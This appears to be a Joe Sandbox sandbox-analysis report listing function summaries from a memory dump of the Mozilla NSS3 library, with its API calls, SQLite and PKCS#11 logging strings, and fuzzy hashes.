Opcode ID: 68a960b113e6145131ee08043887bc0dec23964fba281de8655198ee141e8fb6
Instruction ID: dae374c27dbca464164e0473118edb3b9445e5d0613a7214349113e8840df85c
Opcode Fuzzy Hash: 68a960b113e6145131ee08043887bc0dec23964fba281de8655198ee141e8fb6
Instruction Fuzzy Hash: 8D0144A170331537E9202B699F5AF56255C9B4215DF180831FF04F1B42EAB6F61581BD

Function 6C858780 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 443COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,-00000001,-00000001,00000000,?,?,6C85849F,?,-00000001,-00000001,00000000,?,00000000,?,00000000), ref: 6C85884C
sqlite3_free.NSS3(?,?,?,?,?,?,-00000001,00000000,?,?,6C85849F,?,-00000001,-00000001,00000000,?), ref: 6C8588F1
memset.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,?,?,-00000001,00000000,?,?,6C85849F,?,-00000001), ref: 6C858929
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,-00000001,00000000,?,?,6C85849F,?), ref: 6C858B4C
sqlite3_free.NSS3(?,?,?,?,?,?,?,-00000001,00000000,?,?,6C85849F,?,-00000001,-00000001,00000000), ref: 6C858B7C
sqlite3_free.NSS3(0000000A,?,?,?,?,?,?,?,?,?,-00000001,00000000,?,?,6C85849F,?), ref: 6C858CCF

Strings

%s.xBestIndex malfunction, xrefs: 6C858AEC
no more rows available, xrefs: 6C858B0E
abort due to ROLLBACK, xrefs: 6C858B04
another row available, xrefs: 6C858AB1
unknown error, xrefs: 6C8588DD, 6C858B1B

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_free$memset
String ID: %s.xBestIndex malfunction$abort due to ROLLBACK$another row available$no more rows available$unknown error
API String ID: 2669552516-2256271834
Opcode ID: 8946919291b454df0a622132488f2a90e83ad161c4eb8e5b34c5ead261a50438
Instruction ID: efe489004368183bd1ef461ba7872f5043f03703f3df30545503dd0fb8db690d
Opcode Fuzzy Hash: 8946919291b454df0a622132488f2a90e83ad161c4eb8e5b34c5ead261a50438
Instruction Fuzzy Hash: 100200B5A10219CFDB64CF58C5806AAB7F2FF48314F544A6BD816ABB51D370EC62CB81

Function 6C7C4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6C7878F8), ref: 6C7C4E6D

Part of subcall function 6C7609E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C7606A2,00000000,?), ref: 6C7609F8
Part of subcall function 6C7609E0: malloc.MOZGLUE(0000001F), ref: 6C760A18
Part of subcall function 6C7609E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C760A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C7878F8), ref: 6C7C4ED9

Part of subcall function 6C7B5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C7B7703,?,00000000,00000000), ref: 6C7B5942
Part of subcall function 6C7B5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C7B7703), ref: 6C7B5954
Part of subcall function 6C7B5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C7B596A
Part of subcall function 6C7B5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C7B5984
Part of subcall function 6C7B5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C7B5999
Part of subcall function 6C7B5920: free.MOZGLUE(00000000), ref: 6C7B59BA
Part of subcall function 6C7B5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C7B59D3
Part of subcall function 6C7B5920: free.MOZGLUE(00000000), ref: 6C7B59F5
Part of subcall function 6C7B5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C7B5A0A
Part of subcall function 6C7B5920: free.MOZGLUE(00000000), ref: 6C7B5A2E
Part of subcall function 6C7B5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C7B5A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4EB3

Part of subcall function 6C7C4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7C4EB8,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C484C
Part of subcall function 6C7C4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7C4EB8,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C486D
Part of subcall function 6C7C4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C7C4EB8,?), ref: 6C7C4884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4EC0

Part of subcall function 6C7C4470: TlsGetValue.KERNEL32(00000000,?,6C787296,00000000), ref: 6C7C4487
Part of subcall function 6C7C4470: EnterCriticalSection.KERNEL32(?,?,?,6C787296,00000000), ref: 6C7C44A0
Part of subcall function 6C7C4470: PR_Unlock.NSS3(?,?,?,?,6C787296,00000000), ref: 6C7C44BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C4F8F
PK11_UpdateSlotAttribute.NSS3(?,6C89DCB0,00000000), ref: 6C7C4FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6C7C501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C7878F8), ref: 6C7C506B

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: e4d7c0a6e0689da2153b6d0001601b66f639eab7598edc2899ca852f23aa3158
Instruction ID: 96159c11074bc7ac8fd8999a423216c73d5a7569caa75192aa8c0696a727f8dc
Opcode Fuzzy Hash: e4d7c0a6e0689da2153b6d0001601b66f639eab7598edc2899ca852f23aa3158
Instruction Fuzzy Hash: 9351F3B5A002029FDB119F35EE09AAB36B5EF0531DF190635EC0686A02FB32E954D7D3

Function 6C76ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C76ACE2
malloc.MOZGLUE(00000001), ref: 6C76ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C76AD02
TlsGetValue.KERNEL32 ref: 6C76AD3C
calloc.MOZGLUE(00000001,?), ref: 6C76AD8C
PR_Unlock.NSS3 ref: 6C76ADC0
free.MOZGLUE(00000000), ref: 6C76AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C76AE58
free.MOZGLUE(00000000), ref: 6C76AE69
free.MOZGLUE(?), ref: 6C76AE78
PR_Unlock.NSS3 ref: 6C76AE8C
free.MOZGLUE(?), ref: 6C76AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C76AEC7

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 1a4f17c58db49ff0de7e7d8c36520e5a8adbc09c3150ec74db0dcc2d0dd2a843
Instruction ID: 6a76ad7d059a13cf57cb66f06a0dfab4a50b5c2c1803b36397d743e4a1a578ee
Opcode Fuzzy Hash: 1a4f17c58db49ff0de7e7d8c36520e5a8adbc09c3150ec74db0dcc2d0dd2a843
Instruction Fuzzy Hash: A2519FB4E011269BDF20DF9AEA4666E77B8AF0636DF140135EC05A7E01D331AE45CBD2

Function 6C7AADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C7AADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7AAE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7AAE29

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7AAE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C7AAE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7AAE8A
PR_LogPrint.NSS3(?,00000000), ref: 6C7AAEA0

Strings

hKey = 0x%x, xrefs: 6C7AAE62, 6C7AAE72
C_MessageSignInit, xrefs: 6C7AADE1
(CK_INVALID_HANDLE), xrefs: 6C7AAE1F, 6C7AAE80
hSession = 0x%x, xrefs: 6C7AAE01, 6C7AAE11

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
API String ID: 332880674-605059067
Opcode ID: ae2de8c6d417db34a33a1a59835cf7ce257a3228ea5f48cc761528fbbb105820
Instruction ID: 0742d17b1d459d417da00427c82ac6f754808acc1f9b6364fcb9b21b96bbb78b
Opcode Fuzzy Hash: ae2de8c6d417db34a33a1a59835cf7ce257a3228ea5f48cc761528fbbb105820
Instruction Fuzzy Hash: E231F531601154ABCB209F98DE8DFAA7779AB4632DF444935E8099BB02D734BC09CFD2

Function 6C7AA650 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptInit), ref: 6C7AA676
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7AA6A7
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7AA6B9

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7AA6CF
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C7AA708
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7AA71A
PR_LogPrint.NSS3(?,00000000), ref: 6C7AA730

Strings

hKey = 0x%x, xrefs: 6C7AA6F2, 6C7AA702
(CK_INVALID_HANDLE), xrefs: 6C7AA6AF, 6C7AA710
hSession = 0x%x, xrefs: 6C7AA691, 6C7AA6A1
C_MessageDecryptInit, xrefs: 6C7AA671

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptInit
API String ID: 332880674-2055260395
Opcode ID: f48c3a114d70e2145c7be5b482edd84239b16a6be031edefe9e740d061cbe19b
Instruction ID: 5ce58ee1d46a83fa39c58e3c48bd82d34f4236b9ea740e7dc5f155cc08b651d0
Opcode Fuzzy Hash: f48c3a114d70e2145c7be5b482edd84239b16a6be031edefe9e740d061cbe19b
Instruction Fuzzy Hash: F931B535602114ABCB209FA8DE8CFBA77B5AB4632DF444535E5095BB11D734BC09CF91

Function 6C844C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C844CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C844CFD
sqlite3_value_text16.NSS3(?), ref: 6C844D44

Strings

out of memory, xrefs: 6C844C78, 6C844C9E
no more rows available, xrefs: 6C844D2E
abort due to ROLLBACK, xrefs: 6C844D27, 6C844D33
invalid, xrefs: 6C844CF1
another row available, xrefs: 6C844D20
API call with %s database connection pointer, xrefs: 6C844CF6
unknown error, xrefs: 6C844D56
bad parameter or other API misuse, xrefs: 6C844D05

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: ff81e8d79d71d727696c4c177e522089026441cb52a8b3210456c1e53bcbda43
Instruction ID: 988e4d9a09574136d848f99557f2a2e7bc58048e6193edd759e818f707393044
Opcode Fuzzy Hash: ff81e8d79d71d727696c4c177e522089026441cb52a8b3210456c1e53bcbda43
Instruction Fuzzy Hash: A2317772A0491CA7E7380E249B047A5B32177C231AF5ACD36D8245BE14CB74AC16C3E2

Function 6C7A2DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C7A2DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A2E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A2E33

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A2E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C7A2E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C7A2E81

Strings

ulPinLen = %d, xrefs: 6C7A2E7C
pPin = 0x%p, xrefs: 6C7A2E63
C_InitPIN, xrefs: 6C7A2DF1
(CK_INVALID_HANDLE), xrefs: 6C7A2E2C
hSession = 0x%x, xrefs: 6C7A2E0E, 6C7A2E1E

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
API String ID: 1003633598-1777813432
Opcode ID: 5a10260c4cc573ba40c7a2e9f8475cd169a25cd5fa1404b8a4fc778922809f55
Instruction ID: 55ca63f932814b56694837c9ab517b0352302d8f86d8c0a526fc939bec17de72
Opcode Fuzzy Hash: 5a10260c4cc573ba40c7a2e9f8475cd169a25cd5fa1404b8a4fc778922809f55
Instruction Fuzzy Hash: 6E31D071602154ABDB308B998F4CB9A77B9EB4631DF048535E80DA7B12DB34BC49CBD2

Function 6C7A6EF0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C7A6F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A6F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A6F53

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A6F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C7A6F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C7A6FA1

Strings

C_DigestUpdate, xrefs: 6C7A6F11
pPart = 0x%p, xrefs: 6C7A6F83
(CK_INVALID_HANDLE), xrefs: 6C7A6F4C
hSession = 0x%x, xrefs: 6C7A6F2E, 6C7A6F3E
ulPartLen = %d, xrefs: 6C7A6F9C

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
API String ID: 1003633598-226530419
Opcode ID: 5d7cf4788b445ca9e335bdc9556f9b155b7c76e9867f58ab5543091f42759f3b
Instruction ID: 4b93e1f42eeb91376c8466c1885b5b57253024eef81e0e19b44b2d5813fb5491
Opcode Fuzzy Hash: 5d7cf4788b445ca9e335bdc9556f9b155b7c76e9867f58ab5543091f42759f3b
Instruction Fuzzy Hash: 6131C135602154AFDB309BA8DE4CB9A77B1EB8631DF084435E809A7B12DB34BD49CBD1

Function 6C712450 Relevance: 19.2, APIs: 15, Instructions: 440COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C7124BA
LeaveCriticalSection.KERNEL32(?), ref: 6C71250D
EnterCriticalSection.KERNEL32(?), ref: 6C712554
LeaveCriticalSection.KERNEL32(?), ref: 6C7125A7
EnterCriticalSection.KERNEL32(?), ref: 6C712609
LeaveCriticalSection.KERNEL32(?), ref: 6C71265F
EnterCriticalSection.KERNEL32(?), ref: 6C7126A2
LeaveCriticalSection.KERNEL32(?), ref: 6C7126F5
EnterCriticalSection.KERNEL32(?), ref: 6C712764
LeaveCriticalSection.KERNEL32(?), ref: 6C712898
EnterCriticalSection.KERNEL32(?), ref: 6C7128D0
EnterCriticalSection.KERNEL32(?), ref: 6C712948
LeaveCriticalSection.KERNEL32(?), ref: 6C71299B
EnterCriticalSection.KERNEL32(?), ref: 6C7129E2
LeaveCriticalSection.KERNEL32(?), ref: 6C712A31

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 0e8526a9a2487b9e009874362d88001ef49afe49bac6756c1d573fe245512b59
Instruction ID: b8490b30e60c60d502556e7df4a38b476cf40d90ee363035ce06eb5c52d72ac1
Opcode Fuzzy Hash: 0e8526a9a2487b9e009874362d88001ef49afe49bac6756c1d573fe245512b59
Instruction Fuzzy Hash: 5DF18031B091108FDB24AF65DA9EA6A3770BF87729B1C013DD90657E41CB39AE41CBD2

Function 6C7DE400 Relevance: 18.2, APIs: 12, Instructions: 206threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7DC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C7DDAE2,?), ref: 6C7DC6C2

SECOID_GetAlgorithmTag_Util.NSS3(-000000D8), ref: 6C7DE4A0
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7DE4B1
SECOID_GetAlgorithmTag_Util.NSS3(-00000010), ref: 6C7DE4C4
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7DE4D2
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,00000000), ref: 6C7DE525
PK11_FreeSymKey.NSS3(00000000), ref: 6C7DE592
PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,00000000), ref: 6C7DE5CF
PR_GetCurrentThread.NSS3 ref: 6C7DE5F2
PR_SetError.NSS3(00000000,00000000), ref: 6C7DE601
PK11_PubUnwrapSymKey.NSS3(?,?,-00000001,00000105,00000000), ref: 6C7DE620
PR_GetCurrentThread.NSS3 ref: 6C7DE632
PR_SetError.NSS3(00000000,00000000), ref: 6C7DE641

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Tag_$AlgorithmK11_$CurrentErrorFindFreeThread$DestroyPrivateUnwrap
String ID:
API String ID: 2900466288-0
Opcode ID: d23d9afd90a38059c6a960a1d6d4f712fe572469f1d659c2466b698119bd2c86
Instruction ID: b246a748e22377923509a693c8bf263df0660e442733d6fb0a915d5c0e1449e7
Opcode Fuzzy Hash: d23d9afd90a38059c6a960a1d6d4f712fe572469f1d659c2466b698119bd2c86
Instruction Fuzzy Hash: 2361A2B1A112099FDB11CF68DE89A6BB7E8AF04248F550539E80697B12F731F904CBE1

Function 6C842D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C842D9F

Part of subcall function 6C6FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C75F9C9,?,6C75F4DA,6C75F9C9,?,?,6C72369A), ref: 6C6FCA7A
Part of subcall function 6C6FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6FCB26

sqlite3_exec.NSS3(?,?,6C842F70,?,?), ref: 6C842DF9
sqlite3_free.NSS3(00000000), ref: 6C842E2C
sqlite3_free.NSS3(?), ref: 6C842E3A
sqlite3_free.NSS3(?), ref: 6C842E52
sqlite3_mprintf.NSS3(6C8AAAF9,?), ref: 6C842E62
sqlite3_free.NSS3(?), ref: 6C842E70
sqlite3_free.NSS3(?), ref: 6C842E89
sqlite3_free.NSS3(?), ref: 6C842EBB
sqlite3_free.NSS3(?), ref: 6C842ECB
sqlite3_free.NSS3(00000000), ref: 6C842F3E
sqlite3_free.NSS3(?), ref: 6C842F4C

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
